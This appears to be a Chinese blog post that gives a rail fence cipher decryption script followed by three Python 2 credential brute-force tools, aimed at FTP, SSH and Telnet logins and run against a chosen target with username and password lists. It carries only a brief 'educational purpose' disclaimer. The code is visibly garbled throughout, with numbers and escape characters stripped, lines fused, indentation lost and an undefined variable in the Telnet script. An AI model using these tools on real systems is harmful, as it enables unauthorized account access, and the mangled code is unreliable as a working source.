今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。
方法一(通用脚本):
#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf_ -*-
e = raw_input(‘请输入要解密的字符串n‘)
elen = len(e)
field=[]
for i in range(,elen):
if(elen%i==):
field.append(i)
for f in field:
b = elen / f
result = {x:‘‘ for x in range(b)}
for i in range(elen):
a = i % b;
result.update({a:result[a] + e[i]})
d = ‘‘
for i in range(b):
d = d + result[i]
print ‘分为t‘+str(f)+‘t‘+‘栏时,解密结果为: ‘+d
方法二:
FTP暴力破解脚本
#!/usr/bin/env python
#-*-coding = utf--*-
#author:@xfk
#blog:@blog.sina.com.cn/kaiyongdeng
#date:@--
import sys, os, time
from ftplib import FTP
docs = """
[*] This was written for educational purpose and pentest only. Use it at your own risk.
[*] Author will be not responsible for any damage!
[*] Toolname : ftp_bf.py
[*] Coder :
[*] Version : .
[*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
"""
if sys.platform == 'linux' or sys.platform == 'linux':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
R = "[m";
G = "[m";
Y = "[m"
END = "[m"
def logo():
print G+"n |---------------------------------------------------------------|"
print " | |"
print " | blog.sina.com.cn/kaiyongdeng |"
print " | // ftp_bf.py v.. |"
print " | FTP Brute Forcing Tool |"
print " | |"
print " |---------------------------------------------------------------|n"
print " n [-] %sn" % time.strftime("%X")
print docs+END
def help():
print R+"[*]-t, --target ip/hostname <> Our target"
print "[*]-u, --usernamelist usernamelist <> usernamelist path"
print "[*]-p, --passwordlist passwordlist <> passwordlist path"
print "[*]-h, --help help <> print this help"
print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit()
def bf_login(hostname,username,password):
# sys.stdout.write("r[!]Checking : %s " % (p))
# sys.stdout.flush()
try:
ftp = FTP(hostname)
ftp.login(hostname,username, password)
ftp.retrlines('list')
ftp.quit()
print Y+"n[!] wt,wt!!! We did it ! "
print "[+] Target : ",hostname, ""
print "[+] User : ",username, ""
print "[+] Password : ",password, ""+END
return
# sys.exit()
except Exception, e:
pass except KeyboardInterrupt: print R+"n[-] Exiting ...n"+END
sys.exit()
def anon_login(hostname):
try:
print G+"n[!] Checking for anonymous login.n"+END
ftp = FTP(hostname) ftp.login()
ftp.retrlines('LIST')
print Y+"n[!] wt,wt!!! Anonymous login successfuly !n"+END
ftp.quit()
except Exception, e:
print R+"n[-] Anonymous login failed...n"+END
pass
def main():
logo()
try:
for arg in sys.argv:
if arg.lower() == '-t' or arg.lower() == '--target':
hostname = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
usernamelist = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
passwordlist = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-h' or arg.lower() == '--help':
help()
elif len(sys.argv) <= :
help()
except:
print R+"[-]Cheak your parametars inputn"+END
help()
print G+"[!] BruteForcing target ..."+END
anon_login(hostname)
# print "here is ok"
# print hostname
try:
usernames = open(usernamelist, "r")
user = usernames.readlines()
count =
while count < len(user):
user[count] = user[count].strip()
count +=
except:
print R+"n[-] Cheak your usernamelist pathn"+END
sys.exit()
# print "here is ok ",usernamelist,passwordlist
try:
passwords = open(passwordlist, "r")
pwd = passwords.readlines()
count =
while count < len(pwd):
pwd[count] = pwd[count].strip()
count +=
except:
print R+"n[-] Check your passwordlist pathn"+END
sys.exit()
print G+"n[+] Loaded:",len(user),"usernames"
print "n[+] Loaded:",len(pwd),"passwords"
print "[+] Target:",hostname
print "[+] Guessing...n"+END
for u in user: for p in pwd:
result = bf_login(hostname,u.replace("n",""),p.replace("n",""))
if result != :
print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
else:
print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
if not result :
print R+"n[-]There is no username ans password enabled in the list."
print "[-]Exiting...n"+END
if __name__ == "__main__":
main()
SSH暴力破解
#!/usr/bin/env python
#-*-coding = UTF--*-
#author@:dengyongkai
#blog@:blog.sina.com.cn/kaiyongdeng
import sys
import os
import time
#from threading import Thread
try:
from paramiko import SSHClient
from paramiko import AutoAddPolicy
except ImportError:
print G+'''
You need paramiko module.
http://www.lag.net/paramiko/
Debian/Ubuntu: sudo apt-get install aptitude
: sudo aptitude install python-paramikon'''+END
sys.exit()
docs = """
[*] This was written for educational purpose and pentest only. Use it at your own risk.
[*] Author will be not responsible for any damage!
[*] Toolname : ssh_bf.py
[*] Author : xfk
[*] Version : v..
[*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
"""
if sys.platform == 'linux' or sys.platform == 'linux':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
R = "[m";
G = "[m";
Y = "[m"
END = "[m"
def logo():
print G+"n |---------------------------------------------------------------|"
print " | |"
print " | blog.sina.com.cn/kaiyongdeng |"
print " | // ssh_bf.py v.. |"
print " | SSH Brute Forcing Tool |"
print " | |"
print " |---------------------------------------------------------------|n"
print " n [-] %sn" % time.ctime()
print docs+END
def help():
print Y+" [*]-H --hostname/ip <>the target hostname or ip address"
print " [*]-P --port <>the ssh service port(default is )"
print " [*]-U --usernamelist <>usernames list file"
print " [*]-P --passwordlist <>passwords list file"
print " [*]-H --help <>show help information"
print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END
sys.exit()
def BruteForce(hostname,port,username,password):
'''
Create SSH connection to target
'''
ssh = SSHClient()
ssh.set_missing_host_key_policy(AutoAddPolicy())
try:
ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
status = 'ok'
ssh.close()
except Exception, e:
status = 'error'
pass
return status
def makelist(file):
'''
Make usernames and passwords lists
'''
items = []
try:
fd = open(file, 'r')
except IOError:
print R+'unable to read file '%s'' % file+END
pass
except Exception, e:
print R+'unknown error'+END
pass
for line in fd.readlines():
item = line.replace('n', '').replace('r', '')
items.append(item)
fd.close()
return items
def main():
logo()
# print "hello wold"
try:
for arg in sys.argv:
if arg.lower() == '-t' or arg.lower() == '--target':
hostname = str(sys.argv[int(sys.argv[:].index(arg))+])
if arg.lower() == '-p' or arg.lower() == '--port':
port = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-u' or arg.lower() == '--userlist':
userlist = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-h' or arg.lower() == '--help':
help()
elif len(sys.argv) <= :
help()
except:
print R+"[-]Cheak your parametars inputn"+END
help()
print G+"n[!] BruteForcing target ...n"+END
# print "here is ok"
# print hostname,port,wordlist,userlist
usernamelist = makelist(userlist)
passwordlist = makelist(wordlist)
print Y+"[*] SSH Brute Force Praparing."
print "[*] %s user(s) loaded." % str(len(usernamelist))
print "[*] %s password(s) loaded." % str(len(passwordlist))
print "[*] Brute Force Is Starting......."+END
try:
for username in usernamelist:
for password in passwordlist:
print G+"n[+]Attempt uaername:%s password:%s..." % (username,password)+END
current = BruteForce(hostname, port, username, password)
if current == 'error':
print R+"[-]O*O The username:%s and password:%s Is Disenbabled...n" % (username,password)+END
# pass
else:
print G+"n[+] ^-^ HaHa,We Got It!!!"
print "[+] username: %s" % username
print "[+] password: %sn" % password+END
# sys.exit()
except:
print R+"n[-] There Is Something Wrong,Pleace Cheak It."
print "[-] Exitting.....n"+END
raise
print Y+"[+] Done.^-^n"+END
sys.exit()
if __name__ == "__main__":
main()
TELNET密码暴力破解
#!usr/bin/python
#Telnet Brute Forcer
#http://www.darkcde.com
#dhydr[at]gmail[dot]com
import threading, time, random, sys, telnetlib
from copy import copy
if len(sys.argv) !=:
print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"
sys.exit()
try:
users = open(sys.argv[], "r").readlines()
except(IOError):
print "Error: Check your userlist pathn"
sys.exit()
try:
words = open(sys.argv[], "r").readlines()
except(IOError):
print "Error: Check your wordlist pathn"
sys.exit()
print "nt dhydr[at]gmail[dot]com TelnetBruteForcer v."
print "t--------------------------------------------------n"
print "[+] Server:",sys.argv[]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != :
value = random.sample(words, )
words.remove(value[])
else:
print "nReloading Wordlist - Changing Usern"
reloader()
value = random.sample(words, )
users.remove(users[])
lock.release()
if len(users) ==:
return value[][:-], users[]
else:
return value[][:-], users[][:-]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*
print "User:",user,"Password:",value
tn = telnetlib.Telnet(sys.argv[])
tn.read_until("login: ")
tn.write(user + "n")
if password:
tn.read_until("Password: ")
tn.write(value + "n")
tn.write("lsn")
tn.write("exitn")
print tn.read_all()
print "tnLogin successful:",value, user
tn.close()
work.join()
sys.exit()
except:
pass
for I in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep()